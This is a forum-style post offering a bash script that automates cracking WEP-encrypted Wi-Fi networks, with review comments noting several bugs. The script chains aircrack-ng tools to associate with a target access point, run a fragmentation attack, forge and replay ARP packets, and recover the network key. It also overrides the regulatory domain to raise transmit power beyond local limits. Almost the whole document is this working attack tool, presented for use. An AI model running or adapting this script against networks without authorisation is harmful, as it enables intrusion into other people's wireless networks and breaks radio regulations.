I have written an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

#!/bin/bash
# wepcrack.sh v1.3
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw :-)
# Version 1.1 - Display key and BSSID at end of crack
# Version 1.0 - First Release
#
# Overall flow of this script: root check, interface argument check,
# interface power/monitor setup, MAC lookup, (optionally interactive)
# target selection, capture in an xterm, aireplay/packetforge steps,
# aircrack-ng run, key output, then cleanup of the files it created.
# All working files (*.ivs, *.cap, *.xor, arp-packet, key.txt) live in
# the current working directory; run it from an empty directory.

#################################################################
# CHECKING FOR ROOT
#################################################################
# NOTE(review): $USER is unquoted; if USER is unset or empty the test
# becomes `[ != "root" ]`, which is a syntax error rather than a clean
# failure. Comparing `id -u` against 0 would be the usual check.
if [ `echo -n $USER` != "root" ]
then
    echo "MESSAGE:"
    echo "MESSAGE: ERROR: Please run as root!"
    echo "MESSAGE:"
    exit 1
fi

#################################################################
# CHECKING TO SEE IF INTERFACE IS PROVIDED
#################################################################
# Argument 1 is the wireless interface; arguments 2 and 3 (BSSID,
# channel) are described as optional in the usage text below.
if [ -z ${1} ]
then
    echo "MESSAGE: Version number ${VERSION}"
    echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel]"
    echo "MESSAGE: Example #`basename ${0}` wlan0 (everything else is optional)"
    exit 1
else
    # Only the first six characters of the argument are kept, so an
    # interface name longer than six characters is silently truncated.
    INTERFACE="`echo "${1}" | cut -c 1-6`"
fi

#################################################################
# PUT WIFI IN HIGHPOWER AND MONITOR MODE AND CHANGE MAC
#################################################################
# The MAC change mentioned in the ChangeLog is commented out here, so
# the interface keeps its real MAC address.
#macchanger -r ${INTERFACE}
# Overrides the regulatory domain for the card; the txpower limits then
# come from that domain rather than the local one.
iw reg set BO
iwconfig ${INTERFACE} txpower 30
# Parses the "Current" txpower line from iwlist output for display only;
# presumably depends on the exact iwlist output format — verify locally.
POWER=`iwlist ${INTERFACE} txpower | grep Current | tr -s ' ' | cut -d '(' -f2 | sed -e s/')'//`
echo "MESSAGE: ${INTERFACE} power set to ${POWER}"
echo "MESSAGE: Putting ${INTERFACE} in monitor mode"
# NOTE(review): airmon-ng start typically creates a separate monitor
# interface; the later commands keep using ${INTERFACE}, while the
# cleanup at the bottom stops a hard-coded "mon0" — confirm these refer
# to the same interface on the system this runs on.
airmon-ng start ${INTERFACE}

#################################################################
# GET INTERFACE MAC ADDRESS
#################################################################
# Takes field 5 of the ifconfig line naming the interface and trims it
# to 17 characters (the length of "xx:xx:xx:xx:xx:xx"). Relies on the
# ifconfig output layout; assumes the MAC is in that column — TODO confirm.
MACADDRESS=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`

#################################################################
# CHECK IF BSSID,CHANNEL & TARGETNAME WERE PROVIDED
#################################################################
# NOTE(review): when both $2 and $3 are supplied this block is skipped,
# but BSSID and CHANNEL are never assigned from $2/$3 anywhere in the
# script, so the later airodump-ng/aireplay-ng lines would run with
# empty values. The variables are only set by the interactive prompts
# below; a fix is `BSSID=${2}` and `CHANNEL=${3}` in an else branch.
if [ -z ${2} ] || [ -z ${3} ] ; then
    #################################################################
    # SHOW VISIBLE WEP NETWORKS
    #################################################################
    echo "MESSAGE: Will now display all visible WEP networks"
    echo "MESSAGE: Once you have identified the network you wish to target press Ctrl-C to exit"
    read -p "MESSAGE: Press enter to view networks"
    # Runs in the foreground until the user presses Ctrl-C.
    airodump-ng --encrypt WEP ${INTERFACE} # mon0

    #################################################################
    # USER INPUT DETAILS FROM AIRODUMP
    #################################################################
    # Loops until the user confirms; the entered BSSID and channel are
    # not validated for format before being passed to the tools below.
    while true
    do
        echo -n "MESSAGE: Please enter the target BSSID here: "
        read -e BSSID
        echo -n "MESSAGE: Please enter the target channel here: "
        read -e CHANNEL
        echo "MESSAGE: Target BSSID            : ${BSSID}"
        echo "MESSAGE: Target Channel          : ${CHANNEL}"
        echo "MESSAGE: Interface MAC Address   : ${MACADDRESS}"
        echo -n "MESSAGE: Is this information correct? (y or n): "
        read -e CONFIRM
        case $CONFIRM in
                y|Y|YES|yes|Yes)
                break ;;
                *) echo "MESSAGE: Please re-enter information"
        esac
    done
fi

#################################################################
# START AIRODUMP IN XTERM WINDOW
#################################################################
# The capture runs in a background xterm; its PID is kept so it can be
# killed during cleanup. Output files are written with the prefix
# "capture" in the current directory.
echo "MESSAGE: Starting packet capture - Ctrl-c to end it"
xterm -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
# Brief pause so the capture is running before the next steps start.
sleep 2

#################################################################
# ASSOCIATE WITH AP & THEN PERFORM FRAGMENTATION ATTACK
#################################################################
# None of the exit statuses below are checked; each step runs even if
# the previous one failed. The unquoted *.xor glob on the packetforge-ng
# line expands to whatever .xor files exist in the current directory,
# so a stale file from an earlier run would be picked up as well.
aireplay-ng -1 0 -a ${BSSID} -h ${MACADDRESS} ${INTERFACE}
aireplay-ng -5 -b ${BSSID} -h ${MACADDRESS} ${INTERFACE}
packetforge-ng -0 -a ${BSSID} -h ${MACADDRESS} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE}
xterm -e "aireplay-ng -2 -r arp-packet ${INTERFACE}" & AIREPLAYPID=$!

#################################################################
# ATTEMPTING TO CRACK
#################################################################
# The retry loop is commented out, so aircrack-ng runs exactly once
# against every *.ivs file in the current directory and writes any
# recovered key to key.txt.
#while true
#do
    aircrack-ng -n 128 -b ${BSSID} *.ivs -l key.txt
#   echo -n "MESSAGE: Did you get the key?: (y or no)"
#   read -e CONFIRM
#   case $CONFIRM in
#           y|Y|YES|yes|Yes)
#           break ;;
#           *) echo "MESSAGE: Will attempt to crack again..." && sleep 3
#   esac
#done

#################################################################
# OUTPUT BSSID AND KEY
#################################################################
# If aircrack-ng did not produce key.txt this cat fails and KEY is
# empty; the script still continues to cleanup and exits 0.
KEY=`cat key.txt`
echo "MESSAGE: Target BSSID            : ${BSSID}"
echo "MESSAGE: Target Key              : ${KEY}"


#################################################################
# DELETE FILES CREATED DURING WEP CRACKING
#################################################################
# Stops both background xterms, takes the (hard-coded) mon0 interface
# down, and removes working files. NOTE(review): the rm uses bare globs
# in the current directory, so any pre-existing *.ivs, *.cap or *.xor
# files there are deleted too — another reason to run from an empty
# directory. arp-packet is not removed.
kill ${AIRODUMPPID}
kill ${AIREPLAYPID}
airmon-ng stop mon0
rm *.ivs *.cap *.xor key.txt
exit 0
